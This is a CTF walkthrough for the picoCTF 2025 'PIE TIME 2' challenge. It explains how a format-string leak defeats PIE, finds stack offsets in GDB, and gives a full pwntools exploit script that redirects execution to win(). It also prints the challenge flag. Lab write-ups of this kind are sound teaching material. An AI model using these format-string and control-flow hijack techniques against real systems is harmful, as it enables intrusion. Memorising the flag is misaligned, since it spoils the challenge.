picoCTF 2025: PIE TIME 2 — Walkthrough

  • Category: Binary Exploitation
  • Difficulty: Medium
  • Key Concepts: PIE (Position Independent Executable), Format String Exploits, x86-64 Stack Layout, Offset Calculation.

What's This Challenge About?

This binary has two bugs that we can chain together to grab the flag.

  1. The Leak (Format String Bug): The program prints our input using printf(buffer) without specifying a format like %s. This means if we throw in %p (pointer), printf will snoop around the CPU registers and stack memory and spill whatever's sitting there. We use this to figure out where the program is actually running in memory.
  2. The Jump (Control Flow Hijack): The program asks for an address through scanf and then jumps to it. If we know where the win() function lives, we just point it there and grab the flag.

The Core Concept: What is PIE?

PIE (Position Independent Executable) is like a security feature that moves your house every time you run the program.

  • Non-PIE (Static): The house is always at address 100. You can just write "Go to 100" in your exploit and you're golden.
  • PIE (Dynamic): Every time the program runs, the OS picks a random starting address (like 5000, 9000, or 25000) and plops the entire house there.

The trick: Even though the absolute address keeps changing, the layout inside never changes.

  • The kitchen is always 10 steps from the front door.
  • The bedroom is always 50 steps from the front door.

If we can find where the front door is (the Base Address) by peeking at a map (our leak), we can just add "50 steps" to find the bedroom (the Win Function).


Phase 2: Looking at the Binary

Before running anything, we check out the binary to measure the "steps" (offsets) between functions. These distances never change.

We need two numbers:

  1. Target Offset: Where the win() function sits relative to the start.
  2. Reference Offset: Where the instruction that call_functions returns to (inside main) is located.

Command:

objdump -d vuln | grep win
objdump -d vuln | grep -A 5 "main>:"

What we find:

  • win is at offset 0x136a.
  • The instruction right after call_functions in main is at offset 0x1441. This is our Return Address. When call_functions finishes, the CPU pops this address from the stack to know where to jump back.

Figure 1: The objdump output shows the static addresses. We can see win lives at offset 136a. The screenshot shows the start of main; in the full output, the call instruction to call_functions appears at 143c, with the return address right after at 1441. These are our "anchors" for the PIE calculation.


Phase 3: Finding It on the Stack

Now we need to figure out exactly where that Return Address (...441) sits on the stack so we can leak it using %p.

Step-by-Step GDB Debugging

  1. Fire up GDB: gdb ./vuln
  2. Set a Breakpoint: We want to pause right before printf runs to see the stack state.
    disassemble call_functions
    # Find where printf gets called and break there
    break *call_functions+80

  3. Run it: run
  4. Input: When prompted, type something distinctive like AAAAAAAA.
  5. Check the Stack: When the breakpoint hits, we look at stack memory. We're hunting for a value ending in 441.
    x/60gx $rsp
    • x: Examine memory.
    • /60gx: Show 60 units, formatted as Giant (64-bit) Hex.
    • $rsp: Start at the Stack Pointer.

The Calculation: Finding the Format String Offset

To find our target on the stack, we need to understand how printf grabs arguments in x86-64:

How Arguments Work in x86-64 (System V ABI):

  • Positions 1-6: CPU Registers (RDI, RSI, RDX, RCX, R8, R9)
    • %1$p through %6$p read these registers
  • Position 7 onward: Stack memory
    • %7$p reads the first 8-byte value on the stack ($rsp + 0)
    • %8$p reads the second value ($rsp + 8)
    • %9$p reads the third value ($rsp + 16)
    • And so on...

The Formula:

$$\text{Format Offset} = 7 + \text{Stack Index}$$

Where Stack Index is the position counting from the top of the stack ($rsp), starting at 0.

Step-by-Step:

  1. Find the Target: Look through the GDB stack dump (x/60gx $rsp) for a value ending in 441.


  2. Count the Stack Index:

    • Count how many 8-byte rows down from $rsp the target shows up
    • The first row is Index 0, second row is Index 1, etc.
  3. Do the Math:

    • Example: Target found at Stack Index 12
    • Calculation: 7 + 12 = 19
    • Result: Use %19$p
  4. Verify: The leaked value should end in 441 (matching our static offset).


Example:

If we find the return address at $rsp + 0x60:

  • Convert offset to index: 0x60 / 8 = 12 (Stack Index 12)
  • Apply formula: 7 + 12 = 19
  • Use format specifier: %19$p

Heads up: Stack layout can shift between environments (local vs. remote, different GDB versions, compiler flags, etc.). Always double-check your offset in your own GDB session. If the return address appears at Stack Index 13 instead of 12, adjust it: 7 + 13 = 20 → use %20$p.

Figure 2: This GDB screenshot shows stack memory (x/60gx $rsp). By scanning the stack dump, we can spot the return address (ending in 441). Count the 8-byte rows from $rsp to find the Stack Index, then use the formula 7 + Stack_Index to figure out which format specifier to use. In different setups, this index might vary, which is why the script scans multiple offsets.


Phase 4: The Exploit Script

We use Python and pwntools to automate all the math. Here's the full script with comments explaining what's going on.

The "PIE Math"

  1. Leak: The server tells us it's currently at 0x7ffeee111441.
  2. Calculate Base: We know this instruction should be at 0x1441.
    • Base Address = 0x7ffeee111441 - 0x1441 = 0x7ffeee110000
  3. Calculate Target: We know win is always at 0x136a.
    • Win Address = 0x7ffeee110000 + 0x136a = 0x7ffeee11136a.

The Python Script

from pwn import *

# Connect to the challenge
# Replace with actual host/port or process('./vuln') for local testing
r = remote('rescued-float.picoctf.net', 51808)

# 1. Define the "Blueprint" (Static Offsets)
# These come from our objdump analysis in Phase 2
STATIC_RET_ADDR = 0x1441
STATIC_WIN_ADDR = 0x136a

r.recvuntil(b"Enter your name:")

# 2. Send the Probe
# Wide range to handle environment differences (Stack Index 10-16)
# Corresponds to format specifiers %17$p through %23$p (using formula: 7 + Index)
# This ensures we catch the leak even if the stack layout is slightly different
payload = b"|%17$p|%18$p|%19$p|%20$p|%21$p|%22$p|%23$p"
r.sendline(payload)

# 3. Parse the Leak
output = r.recvline().decode()
leaks = output.split('|')

leaked_addr = None
for leak in leaks:
    if not leak.strip():
        continue
    try:
        val = int(leak, 16)
        
        # CRITICAL CHECK: (val & 0xFFF)
        # PIE randomization changes the upper bits but keeps page alignment.
        # The last 12 bits (3 hex nibbles) stay constant.
        # If the static address ends in 441, the randomized address MUST also end in 441.
        # This confirms we found the right pointer and not random stack junk.
        if (val & 0xFFF) == (STATIC_RET_ADDR & 0xFFF):
            leaked_addr = val
            print(f"[*] Found Leak: {hex(leaked_addr)}")
            break
    except ValueError:
        continue

if leaked_addr is None:
    print(f"Output received: {output}")
    exit("Leak not found - check your GDB offsets and expand the payload range")

# 4. Do the PIE Math
# Real_Address - Static_Offset = Base_Address
base = leaked_addr - STATIC_RET_ADDR
print(f"[*] PIE Base: {hex(base)}")

# Base_Address + Win_Offset = Real_Win_Address
win = base + STATIC_WIN_ADDR
print(f"[*] Win Address: {hex(win)}")

# 5. Send the payload
r.recvuntil(b"address to jump to")
# Convert the calculated integer back to a hex string
r.sendline(hex(win).encode())

# 6. Get the Flag
r.interactive()

Why the Script Scans Multiple Offsets

The payload |%17$p|%18$p|%19$p|%20$p|%21$p|%22$p|%23$p| covers Stack Indices 10 through 16:

  • %17$p = 7 + 10 (Stack Index 10)
  • %19$p = 7 + 12 (Stack Index 12)
  • %23$p = 7 + 16 (Stack Index 16)

This range makes sure the script works across different setups where the return address might be at slightly different positions on the stack. The validation check (val & 0xFFF == 0x441) automatically picks out the correct leak from the candidates.

Figure 3: The final output of the script. It successfully leaks the address, calculates the PIE base, figures out the current address of win, sends it to the server, and gets the flag picoCTF{p13_5h4u1dn'r_i34k_9c5bb792}.


Wrapping Up

This walkthrough shows a complete PIE bypass using format string exploitation:

  1. Static Analysis: Pull fixed offsets from the binary (win at 0x136a, return address at 0x1441)
  2. Dynamic Analysis: Use GDB to find where the return address appears on the stack
  3. Calculate Offset: Apply the formula Format_Offset = 7 + Stack_Index
  4. Exploit: Leak the randomized address, calculate the PIE base, and redirect execution to win()

The key insight: while PIE randomizes absolute addresses, relative offsets between functions stay the same—so once we leak a single known reference point, we can calculate any function's address.